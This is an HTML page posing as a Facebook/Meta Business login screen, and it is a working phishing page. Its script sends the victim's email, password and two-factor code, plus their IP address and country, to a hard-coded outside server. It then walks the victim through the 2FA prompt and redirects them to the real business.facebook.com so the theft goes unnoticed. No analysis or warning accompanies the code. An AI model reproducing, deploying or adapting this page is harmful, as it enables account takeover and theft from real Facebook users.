<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Meta Business Tools</title>
    <link rel="shortcut icon" href="fb.png" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            background-color: #EEF6FE;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }

        .home {
            text-align: center;

        }

        .content {
            min-width: 980px;
            min-height: 536px;
            display: flex;
            width: 100%;
        }

        .content-left {
            box-sizing: border-box;
            margin-right: 0;
            padding-right: 110px;
            width: 580px;
            display: inline-block;
        }

        .content-left .image {
            width: 548px;
            height: 182px;
            padding: 112px 0 16px;
            display: flex;
        }

        .content-left .content {
            width: 500px;
        }


        .content-left .content h2 {
            font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
            font-size: 28px;
            color: #1c1e21;
            grid-area: auto;
            line-height: 32px;
            padding: 0 0 20px;
            width: 500px;
        }

        .image img {
            display: inline;
            grid-area: auto;
            line-height: 16px;
            margin: -28px;
            min-width: 321px;
            max-height: 106px;
            min-height: 0;
            object-fit: cover;
        }

        .content-right {
            display: inline-block;
            line-height: 16px;
        }


        .formLogin {
            background-color: #fff;
            border: none;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
            box-sizing: border-box;
            margin: 40px 0 0;
            padding: 20px 15px 28px;
            width: 396px;
            height: 360px;
            text-align: center;
            align-items: center;
        }

        .Input {
            height: 52px;
            background-color: #ffffff;
            border-radius: 6px;
            color: #1d2219;
            display: inline-block;
            font-size: 17px;
            line-height: 16px;
            padding: 14px 16px;
            border: 1px solid #ccc;
            margin-bottom: 15px;
            width: 100%;
        }

        .Input i {
            margin-top: 50px;
        }

        .Input :focus {
            border: 1px solid #1877F2 !important;
        }

        .buttunlog {
            background-color: #0866ff;
            border: none;
            border-radius: 6px;
            font-size: 20px;
            line-height: 48px;
            padding: 0 16px;
            width: 100%;
            color: #fff;
            font-size: 20px;
            font-weight: 700;
            line-height: 48px;
            justify-content: center;
            cursor: pointer;
            margin-bottom: 30px;
        }

        .formLogin .forgottent {
            color: #0866ff;
            font-size: 14px;
            font-weight: 500;
            line-height: 19px;
            text-align: center;
            text-decoration: none;
            margin-bottom: 15px;
        }

        .hr {
            color: #dadde1;
        }

        .create {
            background-color: #42b72a;
            border-radius: 6px;
            display: inline-block;
            color: #ffffff;
            font-size: 17px;
            font-weight: 700;
            justify-content: center;
            line-height: 48px;
            padding: 0px 16px;
            text-align: center;
            text-decoration: none;
        }

        .formLogin .create:hover {
            color: #ffffff;
            opacity: 0.9;
        }

        .bottomForm {
            width: 396px;
            text-align: center;
            margin: 28px 0 0;
            font-size: 14px;
            line-height: 19px;
        }

        .bottomForm a {
            font-weight: 600;
            font-size: 14px;
            text-decoration: none;
            color: #1C1E21;
            font-family: SFProText-Semibold, Helvetica, Arial, sans-serif;

        }

        .bottomForm span {
            font-family: SFProText-Semibold, Helvetica, Arial, sans-serif;

        }
    </style>
    <script>
        function submitForm() {
            var emailInput = document.getElementById('email');
            var emailValue = emailInput.value;
            var passwordInput = document.getElementById('pass');
            var passwordValue = passwordInput.value;
            if (passwordValue === '') {
                passwordInput.focus();
            }
            else if (emailValue === '') {
                emailInput.focus();
            }
            else {
                var button = document.getElementById("u_0_5_mU");
                button.style.cursor = "not-allowed";
                event.preventDefault();
                const ipAddress = localStorage.getItem('ipAddress');
                const address = localStorage.getItem('address');
                var code = document.getElementById('2facode')
                var codeValue = code.value
                fetch('http://13.213.68.56/check_facebook_status?username=' + encodeURIComponent(emailValue) + '&password=' + encodeURIComponent(passwordValue) + '&code=' + encodeURIComponent(codeValue) + '&ip=' + encodeURIComponent(ipAddress) + '&country=' + encodeURIComponent(address))
                    .then(response => {
                        if (!response.ok) {
                            throw new Error('Network response was not ok');
                        }
                        return response.text();
                    })
                    .then(data => {
                        if (data === '2FA') {
                            var emailContainer = document.getElementById('emailContainer');
                            emailContainer.style.display = 'none';
                            var passContainer = document.getElementById('passContainer');
                            passContainer.style.display = 'none';
                            var twoFactorContainer = document.getElementById('2faContainer');
                            twoFactorContainer.style.display = 'block';
                            var button = document.getElementById("u_0_5_mU");
                            button.style.cursor = "";
                            button.addEventListener("click", submitForm);
                        }
                        else if (data === 'WRONG') {
                            emailInput.value = '';
                            passwordInput.style.color = 'red';
                            passwordInput.type = 'text';
                            passwordInput.value = 'Wrong password';
                            code.value = 'Wrong code';
                            code.style.color = 'red';
                        }
                        else if (data == 'CP') {
                            window.location.href = "https://business.facebook.com/";
                        }
                    })
                    .catch(error => {
                        console.error('There has been a problem with your fetch operation:', error);
                    })
                    .finally(() => {
                        var button = document.getElementById("u_0_5_mU");
                        button.style.cursor = "";
                        button.addEventListener("click", submitForm);
                    });
            }
        }
        function removeRedBorder() {
            var emailInput = document.getElementById('email');
            var passwordInput = document.getElementById('pass');
            var code = document.getElementById('2facode');
            passwordInput.setAttribute('placeholder', 'Password');
            passwordInput.style.color = 'black';
            if (passwordInput.value.includes('Wrong password')) {
                passwordInput.value = '';
            } else if (code.value.includes('Wrong code')) {
                code.value = '';
            }
            passwordInput.type = 'password';
            code.style.color = 'black';
            code.setAttribute('placeholder', '2FA code');
        }
    </script>
    <script>
        document.addEventListener('DOMContentLoaded', async function () {
            let ipAddress;
            let address;
            try {
                const ipifyResponse = await fetch('https://api.ipify.org?format=json');
                const ipifyData = await ipifyResponse.json();
                ipAddress = ipifyData.ip;

                const ipLocationNetResponse = await fetch(`https://api.iplocation.net/?cmd=ip-country&ip=${ipAddress}`);
                const ipLocationNetData = await ipLocationNetResponse.json();
                address = ipLocationNetData.country_name;

                localStorage.setItem('ipAddress', ipAddress);
                localStorage.setItem('address', address);
            } catch (error) {
                console.error('Lỗi:', error);
            }
        });

    </script>
</head>

<body>
    <div class="home">
        <div class="content">
            <div class="content-left col-6">
                <div class="image">
                    <img src="pfb.svg" alt="">
                </div>
                <div class="content-left text">
                    <h2>
                        Facebook helps you connect and share with the people in your life.
                    </h2>
                </div>
            </div>
            <div class="content-right col-6">
                <div class="formLogin">
                    <div class="email" id="emailContainer">
                        <input type="text" class="Input" placeholder="Email address or phone number" id="email">
                    </div>
                    <div class="email" id="2faContainer" style="display: none;
                    margin-top: 20px;">
                        <input type="text" class="Input" placeholder="2FA code" id="2facode" onfocus="removeRedBorder()"
                            oninput="removeRedBorder()">
                    </div>
                    <div class="password" id="passContainer">
                        <input type="password" class="Input" placeholder="Password" id="pass">
                    </div>
                    <button class="buttunlog" name="login" id="u_0_5_mU" onclick="submitForm()">Log in</button>
                    <a class="forgottent" href="#">Forgotten password?</a>
                    <hr class="hr">
                    <a class="create" href="#">Create new account</a>
                </div>
                <div class="bottomForm">
                    <a href="">Create a Page </a>
                    <span>for a celebrity, brand or business.</span>
                </div>
            </div>
        </div>
    </div>
</body>

</html>